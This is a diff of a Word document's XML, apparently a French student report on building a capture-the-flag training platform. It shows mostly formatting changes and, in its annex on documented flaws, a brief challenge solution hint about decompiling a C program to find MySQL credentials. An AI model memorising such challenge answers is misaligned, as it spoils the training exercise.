--- a/trame documentation faille/CPIRMOBCZ.docx
+++ b/trame documentation faille/CPIRMOBCZ.docx
@@ -1,12 +1,13 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
   <w:body>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
           <w:caps/>
+          <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:id w:val="-1473982656"/>
         <w:docPartObj>
@@ -18,7 +19,6 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:caps w:val="0"/>
-          <w:lang w:eastAsia="en-US"/>
         </w:rPr>
       </w:sdtEndPr>
       <w:sdtContent>
@@ -41,6 +41,7 @@
                 <w:rPr>
                   <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
                   <w:caps/>
+                  <w:lang w:eastAsia="en-US"/>
                 </w:rPr>
                 <w:alias w:val="Société"/>
                 <w:id w:val="15524243"/>
@@ -50,6 +51,11 @@
                 <w:dataBinding w:prefixMappings="xmlns:ns0='http://schemas.openxmlformats.org/officeDocument/2006/extended-properties'" w:xpath="/ns0:Properties[1]/ns0:Company[1]" w:storeItemID="{6668398D-A668-4E3E-A5EB-62B293D839F1}"/>
                 <w:text/>
               </w:sdtPr>
+              <w:sdtEndPr>
+                <w:rPr>
+                  <w:lang w:eastAsia="fr-FR"/>
+                </w:rPr>
+              </w:sdtEndPr>
               <w:sdtContent>
                 <w:tc>
                   <w:tcPr>
@@ -263,23 +269,7 @@
                         <w:b/>
                         <w:bCs/>
                       </w:rPr>
-                      <w:t xml:space="preserve"> </w:t>
-                    </w:r>
-                    <w:proofErr w:type="spellStart"/>
-                    <w:r>
-                      <w:rPr>
-                        <w:b/>
-                        <w:bCs/>
-                      </w:rPr>
-                      <w:t>Gwendal</w:t>
-                    </w:r>
-                    <w:proofErr w:type="spellEnd"/>
-                    <w:r>
-                      <w:rPr>
-                        <w:b/>
-                        <w:bCs/>
-                      </w:rPr>
-                      <w:t xml:space="preserve"> – Bernard Gary – Minaret Alexandre – </w:t>
+                      <w:t xml:space="preserve"> Gwendal – Bernard Gary – Minaret Alexandre – </w:t>
                     </w:r>
                     <w:proofErr w:type="spellStart"/>
                     <w:r>
@@ -393,7 +383,7 @@
                         <pic:cNvPicPr/>
                       </pic:nvPicPr>
                       <pic:blipFill>
-                        <a:blip r:embed="rId10" cstate="print">
+                        <a:blip r:embed="rId9" cstate="print">
                           <a:extLst>
                             <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                               <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -470,7 +460,7 @@
                         <pic:cNvPicPr/>
                       </pic:nvPicPr>
                       <pic:blipFill>
-                        <a:blip r:embed="rId11" cstate="print">
+                        <a:blip r:embed="rId10" cstate="print">
                           <a:extLst>
                             <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                               <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -547,7 +537,7 @@
                         <pic:cNvPicPr/>
                       </pic:nvPicPr>
                       <pic:blipFill>
-                        <a:blip r:embed="rId12">
+                        <a:blip r:embed="rId11">
                           <a:extLst>
                             <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                               <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -616,7 +606,7 @@
                         <pic:cNvPicPr/>
                       </pic:nvPicPr>
                       <pic:blipFill>
-                        <a:blip r:embed="rId13" cstate="print">
+                        <a:blip r:embed="rId12" cstate="print">
                           <a:extLst>
                             <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                               <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -706,7 +696,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14" cstate="print">
+                    <a:blip r:embed="rId13" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -767,7 +757,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -811,21 +801,21 @@
     <w:p/>
     <w:sdt>
       <w:sdtPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="auto"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
         <w:id w:val="-1308624703"/>
         <w:docPartObj>
           <w:docPartGallery w:val="Table of Contents"/>
           <w:docPartUnique/>
         </w:docPartObj>
       </w:sdtPr>
-      <w:sdtEndPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-          <w:lang w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:sdtEndPr>
       <w:sdtContent>
         <w:p>
           <w:pPr>
@@ -2781,62 +2771,54 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>), La Réunion (.</w:t>
+        <w:t>), La Réunion (.re), Terres australes et antarctiques françaises (.</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>re</w:t>
+        <w:t>tf</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>), Terres australes et antarctiques françaises (.</w:t>
+        <w:t>), Mayotte (.</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>tf</w:t>
+        <w:t>yt</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>), Mayotte (.</w:t>
+        <w:t>), Saint-Pierre-et-Miquelon (.pm) et Wallis-et-Futuna (.</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>yt</w:t>
+        <w:t>wf</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>), Saint-Pierre-et-Miquelon (.pm) et Wallis-et-Futuna (.</w:t>
+        <w:t>). L'</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>wf</w:t>
+        <w:t>Afnic</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>). L'</w:t>
+        <w:t xml:space="preserve"> se définit également comme fournisseur de solutions techniques et de services de registre, elle est notamment le partenaire technique de nouveaux domaines génériques dont le .paris, le .</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>Afnic</w:t>
+        <w:t>bzh</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> se définit également comme fournisseur de solutions techniques et de services de registre, elle est notamment le partenaire technique de nouveaux domaines génériques dont le .paris, le .</w:t>
+        <w:t>, le .alsace, le .</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
-        <w:t>bzh</w:t>
+        <w:t>ovh</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>, le .alsace, le .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ovh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -2853,15 +2835,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Son siège est situé à Montigny-le-Bretonneux, Saint-Quentin-en-Yvelines. Le président du Conseil d'administration est Emmanuel </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Sartorius</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, le directeur général est Pierre Bonis.</w:t>
+        <w:t>Son siège est situé à Montigny-le-Bretonneux, Saint-Quentin-en-Yvelines. Le président du Conseil d'administration est Emmanuel Sartorius, le directeur général est Pierre Bonis.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2919,7 +2893,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14" cstate="print">
+                    <a:blip r:embed="rId13" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3007,8 +2981,6 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:bookmarkStart w:id="4" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="4"/>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -3055,7 +3027,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3099,11 +3071,11 @@
       <w:r>
         <w:tab/>
       </w:r>
-      <w:bookmarkStart w:id="5" w:name="_Toc509930316"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc509930316"/>
       <w:r>
         <w:t>c) L’équipe</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:r>
@@ -3127,7 +3099,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16">
+                    <a:blip r:embed="rId15">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -3160,11 +3132,11 @@
         <w:pStyle w:val="Titre2"/>
         <w:ind w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc509930317"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc509930317"/>
       <w:r>
         <w:t>2) Présentation du projet</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="5"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -3214,12 +3186,12 @@
         <w:pStyle w:val="Titre3"/>
         <w:ind w:left="708" w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc509930318"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc509930318"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>a) Problématique</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3260,11 +3232,11 @@
         <w:pStyle w:val="Titre3"/>
         <w:ind w:left="708" w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc509930319"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc509930319"/>
       <w:r>
         <w:t>b) Besoins et objectifs</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3425,11 +3397,11 @@
         <w:pStyle w:val="Titre3"/>
         <w:ind w:left="708" w:firstLine="708"/>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc509930320"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc509930320"/>
       <w:r>
         <w:t>c) Moyens disponibles</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3462,15 +3434,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Un serveur sous </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ubuntu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 16.04</w:t>
+        <w:t>Un serveur sous Ubuntu 16.04</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3554,12 +3518,12 @@
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc509930321"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc509930321"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>II) Développement</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3569,11 +3533,11 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc509930322"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc509930322"/>
       <w:r>
         <w:t>Etude des besoins</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="11"/>
+      <w:bookmarkEnd w:id="10"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3583,11 +3547,11 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc509930323"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc509930323"/>
       <w:r>
         <w:t>Etude de la solution de virtualisation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="12"/>
+      <w:bookmarkEnd w:id="11"/>
       <w:r>
         <w:t> </w:t>
       </w:r>
@@ -3707,11 +3671,11 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="13" w:name="_Toc509930324"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc509930324"/>
       <w:r>
         <w:t>Etude de la solution des « failles » et scénarios</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="13"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3773,12 +3737,12 @@
           <w:numId w:val="12"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="14" w:name="_Toc509930325"/>
+      <w:bookmarkStart w:id="13" w:name="_Toc509930325"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Diagramme de cas d’utilisation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="14"/>
+      <w:bookmarkEnd w:id="13"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3790,6 +3754,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DBDAFA4" wp14:editId="4107E06C">
             <wp:extent cx="5760720" cy="3277841"/>
@@ -3804,7 +3771,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
+                    <a:blip r:embed="rId16">
                       <a:clrChange>
                         <a:clrFrom>
                           <a:srgbClr val="FFFFFF"/>
@@ -3845,11 +3812,11 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc509930326"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc509930326"/>
       <w:r>
         <w:t>Management du projet</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="15"/>
+      <w:bookmarkEnd w:id="14"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3859,26 +3826,18 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc509930327"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc509930327"/>
       <w:r>
         <w:t>Organisationnel</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="16"/>
+      <w:bookmarkEnd w:id="15"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Pour la réalisation de ce projet, nous avons travaillé en utilisant la méthode Agile – </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Scrum</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. Nous n’avons pas suivi à la lettre les différents jalons préconisés par la méthode mais nous avons suivi les principes de bases :</w:t>
+        <w:t>Pour la réalisation de ce projet, nous avons travaillé en utilisant la méthode Agile – Scrum. Nous n’avons pas suivi à la lettre les différents jalons préconisés par la méthode mais nous avons suivi les principes de bases :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3952,11 +3911,11 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc509930328"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc509930328"/>
       <w:r>
         <w:t>Relationnel</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="16"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4003,11 +3962,11 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc509930329"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc509930329"/>
       <w:r>
         <w:t>Etude des risques</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="18"/>
+      <w:bookmarkEnd w:id="17"/>
     </w:p>
     <w:tbl>
       <w:tblPr>
@@ -4973,11 +4932,9 @@
                 <w:color w:val="000000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>Gwendal</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -5804,11 +5761,11 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:lastRenderedPageBreak/>
-              <w:t>Re</w:t>
+              <w:t>Re-spécifier</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
-              <w:t xml:space="preserve">-spécifier et valider avec le corps enseignant </w:t>
+              <w:t xml:space="preserve"> et valider avec le corps enseignant </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5837,11 +5794,9 @@
                 <w:color w:val="000000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>Gwendal</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -5872,7 +5827,6 @@
               </w:rPr>
             </w:pPr>
             <w:r>
-              <w:lastRenderedPageBreak/>
               <w:t>Difficultés techniques</w:t>
             </w:r>
           </w:p>
@@ -6682,11 +6636,9 @@
                 <w:color w:val="000000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>Gwendal</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6901,11 +6853,9 @@
                 <w:color w:val="000000"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>Gwendal</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -7131,11 +7081,11 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc509930330"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc509930330"/>
       <w:r>
         <w:t>Contraintes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="19"/>
+      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7266,12 +7216,12 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc509930331"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc509930331"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Etude du marché</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="19"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7289,11 +7239,11 @@
           <w:numId w:val="5"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="21" w:name="_Toc509930332"/>
+      <w:bookmarkStart w:id="20" w:name="_Toc509930332"/>
       <w:r>
         <w:t>Description de la solution utilisée</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="21"/>
+      <w:bookmarkEnd w:id="20"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7308,6 +7258,9 @@
         <w:keepNext/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="160B52CC" wp14:editId="4B741056">
             <wp:extent cx="5760720" cy="4072803"/>
@@ -7326,7 +7279,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18">
+                    <a:blip r:embed="rId17">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7456,13 +7409,8 @@
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Bootstrap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> (</w:t>
+      <w:r>
+        <w:t>Bootstrap (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -7496,12 +7444,12 @@
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="22" w:name="_Toc509930333"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc509930333"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>III) Conclusion</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
+      <w:bookmarkEnd w:id="21"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7521,15 +7469,7 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Plateforme fonctionnelle de CTF déployée sous forme de containers applicatifs sur un serveur </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Ubuntu</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Plateforme fonctionnelle de CTF déployée sous forme de containers applicatifs sur un serveur Ubuntu </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7575,22 +7515,22 @@
       <w:pPr>
         <w:pStyle w:val="Titre1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="23" w:name="_Toc509930334"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc509930334"/>
       <w:r>
         <w:t>IV) Annexes</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="23"/>
+      <w:bookmarkEnd w:id="22"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Titre2"/>
         <w:ind w:left="1065"/>
       </w:pPr>
-      <w:bookmarkStart w:id="24" w:name="_Toc509930335"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc509930335"/>
       <w:r>
         <w:t>Documentation technique des failles</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="24"/>
+      <w:bookmarkEnd w:id="23"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7768,7 +7708,86 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
-        <w:t>Décompiler Programme C puis trouver les ID MySQL pour pouvoir récupérer le flag</w:t>
+        <w:t>L’utilisateur possède une archive zip avec 3 dossiers contenant chacun un fichier .exe.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Capture d’écran : </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
